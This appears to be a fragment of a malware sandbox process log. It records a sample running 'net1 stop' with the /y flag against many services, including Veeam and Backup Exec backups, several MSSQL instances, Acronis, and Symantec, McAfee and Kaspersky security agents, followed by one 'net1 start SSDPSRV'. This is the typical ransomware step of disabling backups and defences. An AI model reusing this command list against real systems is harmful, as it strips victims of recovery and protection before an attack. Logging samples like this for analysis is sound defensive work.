C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵PID:14252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵PID:14244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:14236
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵PID:14228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵PID:14220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y1⤵PID:14212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:14204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵PID:14196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:14028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:14020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:14012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:14004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:13996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵PID:13988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y1⤵PID:13980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:13760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:13752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y1⤵PID:5368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y1⤵PID:5356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y1⤵PID:4304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y1⤵PID:656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y1⤵PID:1308